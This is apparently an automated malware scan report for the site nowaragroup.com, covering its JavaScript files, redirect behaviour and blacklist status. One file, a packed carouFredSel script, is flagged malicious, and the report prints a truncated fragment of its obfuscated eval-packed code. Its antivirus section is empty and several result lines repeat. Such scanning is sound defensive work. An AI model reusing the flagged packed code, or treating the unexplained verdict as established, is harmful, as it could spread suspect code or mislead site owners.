Scanned pages/files
Request | Server response | Status |
http://www.nowaragroup.com/ | 200 OK Content-Length: 29291 Content-Type: text/html | clean |
http://www.nowaragroup.com/templates/touchm/js/jquery.js | 200 OK Content-Length: 265218 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/foundation.min.js | 200 OK Content-Length: 52367 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/modernizr.foundation.js | 200 OK Content-Length: 9288 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/jquery.themepunch.plugins.min.js | 200 OK Content-Length: 13905 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/jquery.themepunch.revolution.min.js | 200 OK Content-Length: 53704 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/jquery.tipsy.js | 200 OK Content-Length: 9787 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/jquery.carouFredSel-6.0.3-packed.js | 200 OK Content-Length: 36109 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(C($){8($.1r.1v){G}$.1r.6o=$.1r.1v=C(u,w){8(1k.S==0){18(I,\'6p 53 7P 1j "\'+1k.4k+\'".\');G 1k}8(1k.S>1){G 1k.1W(C(){$(1k).1v(u,w)})}E y=1k,$14=1k[ Antivirus reports:
| ||
http://www.nowaragroup.com/templates/touchm/js/jquery.touchSwipe.min.js | 200 OK Content-Length: 4325 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/prettify.js | 200 OK Content-Length: 13660 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/jquery.titanlighbox.js | 200 OK Content-Length: 36418 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/jquery.jtweetsanywhere-1.3.1.min.js | 200 OK Content-Length: 30993 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/templates/touchm/js/app-head.js | 200 OK Content-Length: 3548 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/media/system/js/mootools-core.js | 200 OK Content-Length: 83893 Content-Type: application/javascript | clean |
http://www.nowaragroup.com/media/system/js/core.js | 200 OK Content-Length: 3813 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nowaragroup.com
Result:
GET / HTTP/1.1
Host: nowaragroup.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: nowaragroup.com
Referer: http://www.google.com/search?q=nowaragroup.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nowaragroup.com
Referer: http://www.google.com/search?q=nowaragroup.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nowaragroup.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nowaragroup.com/
Result: nowaragroup.com is not infected or malware details are not published yet.
Result: nowaragroup.com is not infected or malware details are not published yet.